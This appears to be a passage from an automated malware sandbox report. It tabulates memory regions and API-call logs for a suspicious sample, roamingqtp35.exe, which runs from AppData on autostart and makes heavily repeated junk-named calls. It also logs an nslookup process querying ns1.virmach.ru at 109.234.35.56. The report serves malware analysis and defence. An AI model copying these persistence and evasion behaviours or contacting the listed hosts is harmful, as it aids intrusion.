| user32.dll | 0x76110000 | 0x76256fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x76390000 | 0x7650dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x76510000 | 0x7656efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x76690000 | 0x76696fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x76710000 | 0x7685efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77080000 | 0x771fafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f0a0000 | 0x7f0a0000 | 0x7f19ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007f1a0000 | 0x7f1a0000 | 0x7f1c2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc173fffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x00007dfc17400000 | 0x7dfc17400000 | 0x7ffc173fffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc17400000 | 0x7ffc175c0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x00007ffc175c1000 | 0x7ffc175c1000 | 0x7ffffffeffff | Private Memory | Readable |
|
|
|
- |
Threads
Thread 0xacc
8
19
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\nslookup.exe, base_address = 0x1380000 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DNSLookupOrder |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = Domain |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpDomain |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = SearchList |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpSearchList |
|
1 | |
| DNS | Get Hostname | name_out = x2vS1cum |
|
1 | |
| DNS | Resolve Name | host = ns1.virmach.ru, address_out = 109.234.35.56 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Connect | remote_address = 109.234.35.56, remote_port = 53 |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 44, size_out = 44 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 44 |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Connect | remote_address = 109.234.35.56, remote_port = 53 |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 35, size_out = 35 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 51 |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Connect | remote_address = 109.234.35.56, remote_port = 53 |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 35, size_out = 35 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 107 |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 |
Process #9: roamingqtp35.exe
9240
35
| Information | Value |
|---|---|
| ID | #9 |
| File Name | c:\users\nd9e1fyi\appdata\roamingqtp35.exe |
| Command Line | "C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:01, Reason: Autostart |
| Unmonitor | End Time: 00:03:23, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:22 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd40 |
| Parent PID | 0x638 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | X2VS1CUM\Nd9E1FYi |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
D44
0x
D50
0x
D70
0x
D84
0x
D88
0x
D8C
0x
D90
0x
D94
0x
D98
0x
D9C
0x
E30
0x
E34
0x
F20
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00054fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x00060fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0006ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00064fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x00070fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x0016ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000080000 | 0x00080000 | 0x00080fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x00090fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x00183fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000170000 | 0x00170000 | 0x00174fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x00170fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000180000 | 0x00180000 | 0x00180fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000180000 | 0x00180000 | 0x00181fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x00190fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x001d3fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x001f5fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x003fffff | Private Memory | Readable, Writable |
|
|
|
- |
| roamingqtp35.exe | 0x00400000 | 0x0044afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| locale.nls | 0x00450000 | 0x0050dfff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000510000 | 0x00510000 | 0x0054ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000550000 | 0x00550000 | 0x00573fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000550000 | 0x00550000 | 0x0058ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000590000 | 0x00590000 | 0x00590fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000005a0000 | 0x005a0000 | 0x005affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000005b0000 | 0x005b0000 | 0x006affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000006b0000 | 0x006b0000 | 0x0074ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000006b0000 | 0x006b0000 | 0x006b0fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x00000000006b0000 | 0x006b0000 | 0x006b0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000006c0000 | 0x006c0000 | 0x006c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000006d0000 | 0x006d0000 | 0x006d0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000006e0000 | 0x006e0000 | 0x006e0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000006f0000 | 0x006f0000 | 0x006f0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000700000 | 0x00700000 | 0x00700fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000710000 | 0x00710000 | 0x00710fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000720000 | 0x00720000 | 0x00720fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000730000 | 0x00730000 | 0x00730fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000740000 | 0x00740000 | 0x0074ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000750000 | 0x00750000 | 0x00750fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000760000 | 0x00760000 | 0x00760fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000770000 | 0x00770000 | 0x0077ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000770000 | 0x00770000 | 0x00774fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000770000 | 0x00770000 | 0x00770fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000780000 | 0x00780000 | 0x0087ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000880000 | 0x00880000 | 0x00a07fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000a10000 | 0x00a10000 | 0x00b90fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000ba0000 | 0x00ba0000 | 0x01f9ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001fa0000 | 0x01fa0000 | 0x0208ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001fa0000 | 0x01fa0000 | 0x01fb3fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000001fa0000 | 0x01fa0000 | 0x01fa0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| counters.dat | 0x01fb0000 | 0x01fb0fff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000001fc0000 | 0x01fc0000 | 0x01ffffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002000000 | 0x02000000 | 0x02002fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000002000000 | 0x02000000 | 0x02017fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000002010000 | 0x02010000 | 0x02012fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000002020000 | 0x02020000 | 0x0205ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002060000 | 0x02060000 | 0x02060fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002070000 | 0x02070000 | 0x02070fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000002080000 | 0x02080000 | 0x0208ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002090000 | 0x02090000 | 0x02190fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002090000 | 0x02090000 | 0x0221ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002090000 | 0x02090000 | 0x0218ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002190000 | 0x02190000 | 0x021cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000021d0000 | 0x021d0000 | 0x0220ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002210000 | 0x02210000 | 0x0221ffff | Private Memory | Readable, Writable |
|
|
|
- |
| sortdefault.nls | 0x02220000 | 0x02556fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000002560000 | 0x02560000 | 0x0295afff | Pagefile Backed Memory | Readable |
|
|
|
- |
| ole32.dll | 0x02960000 | 0x02a49fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000002960000 | 0x02960000 | 0x02a5ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002a60000 | 0x02a60000 | 0x02b5ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002b60000 | 0x02b60000 | 0x02c5ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002c60000 | 0x02c60000 | 0x02d5ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002d60000 | 0x02d60000 | 0x02d9ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002da0000 | 0x02da0000 | 0x02e9ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002ea0000 | 0x02ea0000 | 0x02edffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002ee0000 | 0x02ee0000 | 0x02fdffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002fe0000 | 0x02fe0000 | 0x02feffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000002ff0000 | 0x02ff0000 | 0x02ff0fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000003000000 | 0x03000000 | 0x03000fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000003000000 | 0x03000000 | 0x03008fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000003010000 | 0x03010000 | 0x03055fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003010000 | 0x03010000 | 0x03010fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003020000 | 0x03020000 | 0x03020fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003020000 | 0x03020000 | 0x03021fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000003060000 | 0x03060000 | 0x03060fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003070000 | 0x03070000 | 0x03070fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003080000 | 0x03080000 | 0x03080fff | Private Memory | Readable, Writable |
|
|
|
- |
| wow64win.dll | 0x542b0000 | 0x54329fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x54330000 | 0x5437ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x54380000 | 0x54387fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcr100.dll | 0x6f970000 | 0x6fa2efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rsaenh.dll | 0x6fa30000 | 0x6fa5efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptsp.dll | 0x6fa60000 | 0x6fa72fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| userenv.dll | 0x6fbd0000 | 0x6fbe8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winnsi.dll | 0x6fc70000 | 0x6fc77fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winhttp.dll | 0x6fcf0000 | 0x6fd8afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ondemandconnroutehelper.dll | 0x6fd90000 | 0x6fda1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wininet.dll | 0x6fdc0000 | 0x6ffccfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| urlmon.dll | 0x6ffd0000 | 0x7014dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| fwpuclnt.dll | 0x71540000 | 0x71586fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasadhlp.dll | 0x71590000 | 0x71597fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iphlpapi.dll | 0x715a0000 | 0x715cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| dnsapi.dll | 0x715d0000 | 0x71653fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mswsock.dll | 0x71660000 | 0x716aefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iertutil.dll | 0x71720000 | 0x719eafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| bcrypt.dll | 0x73860000 | 0x7387afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x73bb0000 | 0x73bb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x73bc0000 | 0x73bddfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x73be0000 | 0x73be6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| combase.dll | 0x73bf0000 | 0x73dacfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel.appcore.dll | 0x73db0000 | 0x73dbbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x73ee0000 | 0x73f71fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| powrprof.dll | 0x73f80000 | 0x73fc3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x740c0000 | 0x7411efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x74120000 | 0x741fffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x74300000 | 0x743bdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x74530000 | 0x7455afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| psapi.dll | 0x74560000 | 0x74565fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x74610000 | 0x746bcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| windows.storage.dll | 0x746c0000 | 0x74bb8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shcore.dll | 0x74bc0000 | 0x74c4cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| crypt32.dll | 0x74c50000 | 0x74dc7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x74f10000 | 0x74f54fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| profapi.dll | 0x74f60000 | 0x74f6efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| bcryptprimitives.dll | 0x74fd0000 | 0x75027fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x75090000 | 0x750d3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x750e0000 | 0x764defff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x764e0000 | 0x7662efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| clbcatq.dll | 0x76630000 | 0x766b3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x766c0000 | 0x7683dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x76840000 | 0x76986fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76dc0000 | 0x76e3afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cfgmgr32.dll | 0x76e40000 | 0x76e76fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msasn1.dll | 0x76e80000 | 0x76e8dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x76e90000 | 0x7700afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff9abbfffff | Private Memory | Readable |
|
|
|
- |
| ntdll.dll | 0x7ff9abc00000 | 0x7ff9abdc0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x00007ff9abdc1000 | 0x7ff9abdc1000 | 0x7ffffffeffff | Private Memory | Readable |
|
|
|
- |
|
For performance reasons, the remaining 216 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Threads
Thread 0xd44
833
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x74120000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x7413a980 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x74137570 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x74139e30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x74144ff0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x74120000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x76eef730 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x74120000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x76eef730 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x74120000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x76eef730 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x74120000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x76eef730 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x74120000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x76eef730 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x74120000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x76eef730 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x74120000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x76eef730 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x74120000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x76eed830 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x74120000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x76eed830 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x74120000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x76eef730 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x76eed830 |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Module | Get Filename | process_name = c:\users\nd9e1fyi\appdata\roamingqtp35.exe, file_name_orig = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, size = 260 |
|
1 | |
| Ini | Read Section | file_name_orig = Win.ini, section_name = hozavofoja xewuwozeyugisehatuzagito cuheleta tofexu, data_out = eìv¬Nl³H |
|
249 | |
| Module | Load | module_name = kernel32.dll, base_address = 0x74120000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x74139950 |
|
1 | |
| File | Delete Directory | directory = laxodaromowuku himefuvuriyuseyu zegiyevufebucena sanavazobijayu |
|
249 | |
| Module | Load | module_name = kernel32.dll, base_address = 0x74120000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x74137a50 |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
| Environment | Set Environment String | name = vudowixilebimo po puxewucadibeselusijefe, value = lenutagalukahene kohewo |
|
1 | |
| Window | Find | window_name = vetigisoliwomo ki, class_name = kafiyoracisusiyapepaxe nojopunodojamutocozihizegipo dijimo xusaninapayu fesofitawarixuga |
|
1 | |
